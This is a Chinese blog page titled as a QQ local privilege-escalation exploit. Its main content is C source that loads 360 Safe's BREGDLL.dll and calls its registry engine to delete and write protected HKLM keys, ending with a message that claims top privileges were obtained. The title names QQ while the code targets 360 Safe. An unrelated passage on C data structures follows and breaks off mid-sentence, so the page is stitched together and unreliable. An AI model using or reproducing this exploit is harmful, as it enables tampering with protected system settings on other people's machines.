QQ本地提权漏洞

后门利用程序

  #include

  typedef BOOL (WINAPI *INIT_REG_ENGINE)();

  typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);

  typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);

  typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);

  typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);

  BREG_DELETE_KEY BRegDeleteKey = NULL;

  BREG_OPEN_KEY BRegOpenKey = NULL;

  BREG_CLOSE_KEY BRegCloseKey = NULL;

  REG_SET_VALUE_EX BRegSetValueEx = NULL;

  #define AppPath "Software//Microsoft//Windows//CurrentVersion//App Paths//360safe.exe"

  #define TestDeleteKey HKEY_LOCAL_MACHINE

  #define TestDeleteRegPath "Software//360Safe//Update"

  #define TestSetKey HKEY_LOCAL_MACHINE

  #define TestSetPath "Software//360Safe"

  BOOL InitBRegDll()

  {

  LONG lResult;

  HKEY hKey;

  CHAR cPath[MAX_PATH + 32] = { 0 };

  DWORD dwPathLen = MAX_PATH;

  lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);

  if (FAILED(lResult))

  return FALSE;

  DWORD dwType = REG_SZ;

  lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);

  RegCloseKey(hKey);

  if (FAILED(lResult))

  return FALSE;

  strcat(cPath, "//deepscan//BREGDLL.dll");

  HMODULE modBReg = LoadLibraryA(cPath);

  if (!modBReg)

  return FALSE;

  INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");

  BRegDeleteKey = (BREG_DELETE_KEY)GetProcAddress(modBReg, "BRegDeleteKey");

  BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");

  BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");

  BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");

  if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {

  FreeLibrary(modBReg);

  return FALSE;

  }

  if (!InitRegEngine()) {

  FreeLibrary(modBReg);

  return FALSE;

  }

  return TRUE;

  }

  LONG TestSetRegKey()

  {

  HKEY hKey;

  LONG lResult;

  lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);

  if (FAILED(lResult))

  return lResult;

  DWORD dwType = REG_SZ;

  static char szData[] = "TEST VALUE";

  lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));

  BRegCloseKey(hKey);

  return lResult;

  }

  int main(int argc, char *argv[])

  {

  if (!InitBRegDll()) {

  MessageBoxA(NULL, "初始化BReg失败!", "失败", MB_ICONSTOP);

  return 1;

  }

  if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {

  MessageBoxA(NULL, "键值删除失败!", "失败", MB_ICONSTOP);

  return 2;

  }

  if (FAILED(TestSetRegKey())) {

  MessageBoxA(NULL, "设置键值失败!", "失败", MB_ICONSTOP);

  return 3;

  }

  MessageBoxA(NULL, "突破系统安全检查,获得最高权限,漏洞利用成功!", "成功", MB_OK);

  return 0;

  }
 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
C语言是一种广泛使用的编程语言,它具有高效、灵活、可移植性强等特点,被广泛应用于操作系统、嵌入式系统、数据库、编译器等领域的开发。C语言的基本语法包括变量、数据类型、运算符、控制结构(如if语句、循环语句等)、函数、指针等。在编写C程序时,需要注意变量的声明和定义、指针的使用、内存的分配与释放等问题。C语言中常用的数据结构包括: 1. 数组:一种存储同类型数据的结构,可以进行索引访问和修改。 2. 链表:一种存储不同类型数据的结构,每个节点包含数据和指向下一个节点的指针。 3. 栈:一种后进先出(LIFO)的数据结构,可以通过压入(push)和弹出(pop)操作进行数据的存储和取出。 4. 队列:一种先进先出(FIFO)的数据结构,可以通过入队(enqueue)和出队(dequeue)操作进行数据的存储和取出。 5. 树:一种存储具有父子关系的数据结构,可以通过中序遍历、前序遍历和后序遍历等方式进行数据的访问和修改。 6. 图:一种存储具有节点和边关系的数据结构,可以通过广度优先搜索、深度优先搜索等方式进行数据的访问和修改。 这些数据结构在C语言中都有相应的实现方式,可以应用于各种不同的场景。C语言中的各种数据结构都有其优缺点,下面列举一些常见的数据结构的优缺点: 数组: 优点:访问和修改元素的速度非常快,适用于需要频繁读取和修改数据的场合。 缺点:数组的长度是固定的,不适合存储大小不固定的动态数据,另外数组在内存中是连续分配的,当数组较大时可能会导致内存碎片化。 链表: 优点:可以方便地插入和删除元素,适用于需要频繁插入和删除数据的场合。 缺点:访问和修改元素的速度相对较慢,因为需要遍历链表找到指定的节点。 栈: 优点:后进先出(LIFO)的特性使得栈在处理递归和括号匹配等问题时非常方便。 缺点:栈的空间有限,当数据量较大时可能会导致栈溢出。 队列: 优点:先进先出(FIFO)的特性使得

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值